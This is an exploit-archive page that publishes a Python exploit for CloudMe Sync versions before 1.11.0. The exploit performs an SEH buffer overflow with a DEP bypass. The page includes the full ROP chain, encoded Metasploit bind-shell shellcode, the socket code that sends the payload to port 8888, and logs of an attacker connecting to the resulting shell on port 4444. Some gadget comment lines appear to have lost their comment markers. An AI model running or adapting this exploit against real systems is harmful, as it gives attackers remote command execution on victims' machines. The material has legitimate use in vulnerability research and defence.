CloudMe Sync SEH Buffer Overflow

CloudMe Sync SEH Buffer Overflow: Posted May 28, 2018; Authored by Juan Prescotto; CloudMe Sync versions prior to 1.11.0 SEH buffer overflow exploit with DEP bypass.; tags | exploit, overflow; SHA-256 | f0e35b18cc3b45a2f7245397a9807fa2574cce43e052d6507bbce428f8230e1f; Download | Favorite | View

CloudMe Sync SEH Buffer Overflow

# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)  
# Date: 2018-05-27   
# Author: Juan Prescotto   
# Tested Against: Win7 Pro SP1 64 bit   
# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe   
# Tested Against Version: 1.10.9    
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine 
# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/) 
# for his work on the original exploit 
                                            
# Bad Characers: \x00    
# SEH Offset: 2236   
# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll 
                                            
# Victim Machine:   
# C:\>netstat -nao | find "8888"  
# TCP  0.0.0.0:8888  0.0.0.0:0 LISTENING 2640  
# C:\>tasklist | find "2640"    
# CloudMe.exe  2640 Console  1 36,632 K 
                                            
# Attacking Machine:   
# root@kali:~/Desktop# python cloudme.py   
# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass  
# [+] CloudMe Target IP> 192.168.12.4   
# Sending buffer overflow to CloudMe Service   
# Target Should be Running a Bind Shell on Port 4444!   
    
# root@kali:~/Desktop# nc -nv 192.168.12.4 4444  
# (UNKNOWN) [192.168.12.4] 4444 (?) open   
# Microsoft Windows [Version 6.1.7601]   
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.   
  
# C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe> 
# My register setup when VirtualProtect() is called (Defeat DEP) :
             --
# EAX = NOP (0x90909090)
# ECX = lpOldProtect (ptr to W address)
# EDX = NewProtect (0x40)
# EBX = dwSize
# ESP = lPAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)
 
#!/usr/bin/python
 
import socket,struct
  
print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'
 
def create_rop_chain():
 
  rop chain generated with mona.py - www.corelan.be
  rop_gadgets = [
  0x61d1e7fe,  POP ECX  RETN [Qt5Gui.dll] 
  0x690398a8,  ptr to &VirtualProtect() [IAT Qt5Core.dll]
  0x6fe70610,  MOV EAX,DWORD PTR DS:[ECX]  RETN [libstdc++-6.dll] 
  0x61c40a6f,  XCHG EAX,ESI  RETN [Qt5Gui.dll] 
  0x68c8ea5a,  POP EBP  RETN [Qt5Core.dll] 
  0x68d652e1,  & call esp [Qt5Core.dll]
  0x68fa7ca2,  POP EDX  RETN [Qt5Core.dll] 
  0xfffffdff,  Value to negate, will become 0x00000201
  0x6eb47092,  NEG EDX  RETN [libgcc_s_dw2-1.dll] 
  0x68d52747,  POP EBX  RETN [Qt5Core.dll] 
  0xffffffff,   
  0x68f948bc,  INC EBX  RETN [Qt5Core.dll] 
  0x68f8063c,  ADD EBX,EDX  ADD AL,0A  RETN [Qt5Core.dll] 
  0x68f9a472,  POP EDX  RETN [Qt5Core.dll] 
  0xffffffc0,  Value to negate, will become 0x00000040
  0x6eb47092,  NEG EDX  RETN [libgcc_s_dw2-1.dll] 
  0x61f057ab,  POP ECX  RETN [Qt5Gui.dll] 
  0x6eb5efa3,  &Writable location [libgcc_s_dw2-1.dll]
  0x61dc14d1,  POP EDI  RETN [Qt5Gui.dll] 
  0x64b4ed0c,  RETN (ROP NOP) [libwinpthread-1.dll]
  0x61ba6245,  POP EAX  RETN [Qt5Gui.dll] 
  0x90909090,  nop
  0x61b45ea3,  PUSHAD  RETN [Qt5Gui.dll] 
  ]
  return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
rop_chain = create_rop_chain()
 
 
                            
#msf payload(shell_bind_tcp) > show options
#Module options (payload/windows/shell_bind_tcp):
# Name  Current Setting  Required  Description
# EXITFUNC  thread  yes Exit technique (Accepted: '', seh, thread, process, none)
# LPORT 4444  yes The listen port
# RHOST  no The target address
#msf payload(shell_bind_tcp) > generate -b '\x00' -t py
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
                            
shellcode =  ""
shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99"
shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94"
shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb"
shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18"
shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c"
shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2"
shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed"
shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a"
shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a"
shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27"
shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d"
shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac"
shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34"
shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8"
shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d"
shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38"
shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f"
shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b"
shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69"
shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9"
shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2"
shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26"
shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf"
shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed"
shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4"
shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7"
shellcode += "\xb0\x5d\xf0\x2d"
  
ip=raw_input('[+] CloudMe Target IP> ') 
 
stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) :  SUB ESP,8  ADD ESP,0D8C  POP EBX  POP ESI  POP EDI  POP EBP  RETN 0x08  ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
rop_nop1=struct.pack('<L',0x68b1a714) * 300  RETN 0x10  ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ}
rop_nop2=struct.pack('<L',0x61c6fc53) * 50  RETN  ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
nop = "\x90" * 20
 
payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))
 
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow to CloudMe Service'
print 'Target Should be Running a Bind Shell on Port 4444!'

Top Authors In Last 30 Days

Red Hat 255 files
indoushka 126 files
Ubuntu 91 files
Gentoo 36 files
Jasper Nota 25 files
Debian 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,107)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,868)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,606)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,764)
UNIX (9,439)
UnixWare (187)
Windows (6,674)
Other

CloudMe Sync SEH Buffer Overflow

CloudMe Sync SEH Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CloudMe Sync SEH Buffer Overflow

Share This

CloudMe Sync SEH Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems